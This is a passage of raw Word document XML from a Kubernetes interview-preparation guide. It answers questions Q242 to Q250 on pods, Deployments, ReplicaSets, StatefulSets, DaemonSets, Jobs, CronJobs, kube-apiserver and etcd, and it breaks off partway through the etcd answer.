        </w:rPr>
        <w:t>Q242. Difference between pod and container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A container is the smallest executable unit that packages an application along with its dependencies, libraries, and runtime. It ensures the application runs consistently across environments. Technologies like Docker are commonly used to create and run containers.</w:t>
        <w:br/>
        <w:t>A Pod is the smallest deployable unit in Kubernetes. A pod acts as a wrapper around one or more containers and provides shared networking and storage.</w:t>
        <w:br/>
        <w:t>Key Differences</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Definition</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs a single application/process</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes object that contains one or more containers</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Platform</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker, containerd, CRI-O</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Networking</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Has isolated network by default</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Containers inside a pod share same IP and port space</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Independent filesystem</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shared volumes between containers</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lifecycle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed directly by container runtime</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed by Kubernetes scheduler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scaling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Individual container scaling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods are scaled in Kubernetes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Communication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Through container networking</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Containers inside same pod communicate via localhost</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use Case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Running application process</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deploying and managing applications in Kubernetes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>Suppose we have a Java application with a logging sidecar:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Container 1 → Main Java application</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Container 2 → Log collector (Fluentd/Filebeat)</w:t>
        <w:br/>
        <w:t>Both containers can run inside the same Pod because:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * They need to communicate closely</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * They share storage/log files</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * They should scale together</w:t>
        <w:br/>
        <w:t>Simple Analogy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Container = An individual worker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod = A team room where one or more workers collaborate and share resources</w:t>
        <w:br/>
        <w:t>Important Interview Point</w:t>
        <w:br/>
        <w:t>In real-world Kubernetes environments, we rarely manage containers directly. Kubernetes always deploys containers inside Pods. Even if a pod has only one container, Kubernetes still requires the pod abstraction because it handles:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * scaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * health checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * scheduling</w:t>
        <w:br/>
        <w:t>One-Line Summary</w:t>
        <w:br/>
        <w:t>A container runs an application, while a pod is a Kubernetes abstraction that manages one or more related containers together.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q243. What is a deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Deployment in Kubernetes is a Kubernetes resource used to manage and maintain application Pods declaratively.</w:t>
        <w:br/>
        <w:t>It ensures that:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * The desired number of Pods are running</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Applications can be updated without downtime (rolling updates)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Failed Pods are automatically recreated</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rollbacks can be performed if a deployment fails</w:t>
        <w:br/>
        <w:t>In simple terms:</w:t>
        <w:br/>
        <w:t>Deployment is used to deploy, scale, update, and manage Pods automatically in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q244. Explain ReplicaSets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A ReplicaSet in Kubernetes is a controller that ensures a specified number of identical Pods are always running.</w:t>
        <w:br/>
        <w:t>If a Pod crashes or gets deleted, the ReplicaSet automatically creates a new Pod to maintain the desired count.</w:t>
        <w:br/>
        <w:t>Main Responsibilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maintains Pod availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures high availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatically replaces failed Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports horizontal scaling</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>If ReplicaSet is configured with:</w:t>
        <w:br/>
        <w:t>replicas: 3</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes ensures exactly 3 Pods are always running.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If one Pod fails → ReplicaSet creates another</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If scaled to 5 → ReplicaSet creates 2 more Pods</w:t>
        <w:br/>
        <w:t>Important Interview Point</w:t>
        <w:br/>
        <w:t>In real projects, we usually do not create ReplicaSets directly. Deployments manage ReplicaSets internally and provide additional features like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rolling updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rollbacks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Version management</w:t>
        <w:br/>
        <w:t>One-Line Summary</w:t>
        <w:br/>
        <w:t>ReplicaSet ensures the desired number of Pod replicas are always running in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q245. What is a StatefulSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A StatefulSet in Kubernetes is a Kubernetes workload resource used to manage stateful applications that require:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stable pod identities</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Persistent storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ordered deployment and scaling</w:t>
        <w:br/>
        <w:t>Unlike Deployments, StatefulSets give each Pod:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A unique name</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stable network identity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dedicated persistent volume</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Databases (MySQL, PostgreSQL, MongoDB)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kafka</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Elasticsearch</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Redis clusters</w:t>
        <w:br/>
        <w:t>Key Features</w:t>
        <w:br/>
        <w:t>Predictable Pod names</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>mysql-0</w:t>
        <w:br/>
        <w:t>mysql-1</w:t>
        <w:br/>
        <w:t>mysql-2</w:t>
        <w:br/>
        <w:t xml:space="preserve">      *       * Persistent storage for each Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods restart with same identity and storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ordered startup and shutdown</w:t>
        <w:br/>
        <w:t>Difference from Deployment</w:t>
        <w:br/>
        <w:t>Deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>StatefulSet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Used for stateless apps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Used for stateful apps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod names change</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stable Pod names</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shared/temporary storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Persistent dedicated storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods created randomly</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods created sequentially</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Important Interview Point</w:t>
        <w:br/>
        <w:t>If a database Pod restarts, it must reconnect with the same storage and identity. StatefulSet guarantees this behavior.</w:t>
        <w:br/>
        <w:t>One-Line Summary</w:t>
        <w:br/>
        <w:t>StatefulSet is used to manage stateful applications in Kubernetes with stable identities and persistent storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q246. Explain DaemonSets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A DaemonSet in Kubernetes is a workload controller that ensures a pod runs on every node (or a selected set of nodes) in a cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core concept</w:t>
        <w:br/>
        <w:t>Think of it like a “background agent installer”:</w:t>
        <w:br/>
        <w:t>Whatever node exists in the cluster, DaemonSet makes sure a pod is running there.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it behaves</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * When a new node is added → DaemonSet automatically schedules a pod on it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * When a node is removed → the pod is removed automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If a pod crashes on a node → it is restarted on that same node</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it is used</w:t>
        <w:br/>
        <w:t>DaemonSets are ideal for node-level services, such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Log collectors (Fluentd, Filebeat)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring agents (node-exporter)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security agents (Falco, antivirus agents)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Networking components (CNI plugins)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Scheduling control</w:t>
        <w:br/>
        <w:t>You can restrict where DaemonSet runs using:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * nodeSelector</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * nodeAffinity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * taints &amp; tolerations</w:t>
        <w:br/>
        <w:t>So it doesn’t have to run on every node—only matching ones.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Deployment vs DaemonSet (quick difference)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployment: “Run N replicas anywhere in the cluster”</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * DaemonSet: “Run 1 pod per node”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A DaemonSet ensures that a copy of a pod runs on each node in a Kubernetes cluster and automatically handles node additions and removals to maintain that state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q247. What is a Job in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Job in Kubernetes is a controller that runs a pod to completion and ensures it successfully finishes its task.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A Job is used for finite, one-time workloads:</w:t>
        <w:br/>
        <w:t>“Run this task, complete it successfully, and then stop.”</w:t>
        <w:br/>
        <w:t>Unlike Deployments (which run continuously), Jobs are not long-running services.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Creates one or more pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures the pods run until completion (exit 0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If a pod fails → it is retried automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Once successful → Job is marked as completed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Jobs</w:t>
        <w:br/>
        <w:t>1. Simple Job</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs a task once and completes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: database migration</w:t>
        <w:br/>
        <w:t>2. Parallel Job</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs multiple pods in parallel</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: processing large datasets</w:t>
        <w:br/>
        <w:t>3. Job with completions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs a fixed number of successful completions</w:t>
        <w:br/>
        <w:t>4. CronJob (related concept)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Schedules Jobs periodically (like cron in Linux)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Database migrations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch processing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ETL pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Backup operations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * One-time scripts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key properties</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restart policy is important (usually OnFailure)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports retries via backoffLimit</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Tracks success using pod exit status</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Job vs Deployment</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Job</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Run-to-completion task</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Long-running service</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lifecycle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finite</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Continuous</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Until success</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Always running</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Backup script</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Web server</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A Kubernetes Job ensures that a specified number of pods successfully complete a task, automatically retrying failed pods until the desired completion count is reached, and then terminates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q248. Explain CronJobs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A CronJob in Kubernetes is a controller that runs Jobs on a scheduled time basis, similar to the Linux cron utility.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A CronJob is used when you want to run a task repeatedly at fixed times or intervals.</w:t>
        <w:br/>
        <w:t>Instead of running once (like a Job), it runs periodically.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * CronJob creates a Job at scheduled times</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * That Job then creates one or more pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods run the task to completion</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * After completion, they terminate automatically</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Schedule format</w:t>
        <w:br/>
        <w:t>CronJobs use standard cron syntax:</w:t>
        <w:br/>
        <w:t>* * * * *</w:t>
        <w:br/>
        <w:t>│ │ │ │ │</w:t>
        <w:br/>
        <w:t>│ │ │ │ └── Day of week (0–6)</w:t>
        <w:br/>
        <w:t>│ │ │ └──── Month (1–12)</w:t>
        <w:br/>
        <w:t>│ │ └────── Day of month (1–31)</w:t>
        <w:br/>
        <w:t>│ └──────── Hour (0–23)</w:t>
        <w:br/>
        <w:t>└────────── Minute (0–59)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example schedules</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * */5 * * * * → Every 5 minutes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 0 2 * * * → Every day at 2 AM</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 0 0 * * 0 → Every Sunday at midnight</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Database backups</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Log cleanup</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Report generation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sending scheduled emails/notifications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch ETL pipelines</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Concurrency control: prevent overlapping runs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Allow (default)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Forbid (skip if previous run is active)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Replace (kill old and start new)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * History limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * successfulJobsHistoryLimit</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * failedJobsHistoryLimit</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * StartingDeadlineSeconds: defines how late a missed job can start</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CronJob vs Job vs Deployment</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CronJob</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Job</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scheduled task</w:t>
        <w:br/>
        <w:tab/>
        <w:t>One-time task</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Continuous service</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Repeatedly</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Once</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Always</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Controller creates</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Jobs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A CronJob in Kubernetes is a controller that schedules Jobs to run at specific times or intervals using cron syntax, enabling automated recurring tasks such as backups, reports, and batch processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q249. What is kube-apiserver?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The kube-apiserver is the central management component of Kubernetes that acts as the front door of the Kubernetes control plane.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Every request in Kubernetes goes through the API server.</w:t>
        <w:br/>
        <w:t>Whether you use kubectl, UI tools, or controllers—everything talks to the kube-apiserver.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it does</w:t>
        <w:br/>
        <w:t>The kube-apiserver is responsible for:</w:t>
        <w:br/>
        <w:t>1. API request handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accepts REST requests (create pods, deployments, services, etc.)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Serves as the only entry point to the cluster</w:t>
        <w:br/>
        <w:t>2. Authentication &amp; Authorization</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Authenticates users (certs, tokens, OIDC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Checks permissions using RBAC/ABAC policies</w:t>
        <w:br/>
        <w:t>3. Validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures requests are valid before storing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rejects malformed or unauthorized objects</w:t>
        <w:br/>
        <w:t>4. Data storage interface</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reads/writes cluster state to etcd (key-value store)</w:t>
        <w:br/>
        <w:t>5. Communication hub</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * All other control plane components talk to it:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * controller manager</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kubelets</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture role</w:t>
        <w:br/>
        <w:t>In the Kubernetes control plane:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * kube-apiserver → brain’s front desk</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * etcd → memory store</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * scheduler → decides where pods run</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * controller manager → maintains desired state</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Request flow example</w:t>
        <w:br/>
        <w:t>When you run:</w:t>
        <w:br/>
        <w:t>kubectl create deployment nginx</w:t>
        <w:br/>
        <w:t>Flow:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. kubectl sends request to kube-apiserver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. API server validates it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Stores object in etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Scheduler notices new pod requirement</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Pod gets assigned to a node</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stateless (can run multiple replicas)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Horizontally scalable</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Exposes REST API</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Highly available in production clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>The kube-apiserver is the central control plane component in Kubernetes that exposes the Kubernetes API, handles all client requests, performs authentication and validation, and serves as the gateway for reading and writing cluster state to etcd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q250. Explain etcd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: etcd is the distributed key-value store used by Kubernetes to store all cluster state and configuration data.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>etcd is the “source of truth” for the entire Kubernetes cluster.</w:t>
        <w:br/>
        <w:t>If data is in etcd, Kubernetes considers it the current desired + actual state of the cluster.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it stores</w:t>
        <w:br/>
        <w:t>etcd holds all critical cluster information, such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node information</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod definitions and status</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployments, Services, ConfigMaps</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Secrets (encrypted at rest in production setups)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Kubernetes uses etcd</w:t>
        <w:br/>
        <w:t>The kube-apiserver is the only component that directly talks to etcd:</w:t>
        <w:br/>
        <w:t>Flow example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. User creates a Deployment via API</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. API server validates it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Data is stored in etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Scheduler + controllers read from etcd via API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Cluster state is continuously reconciled</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
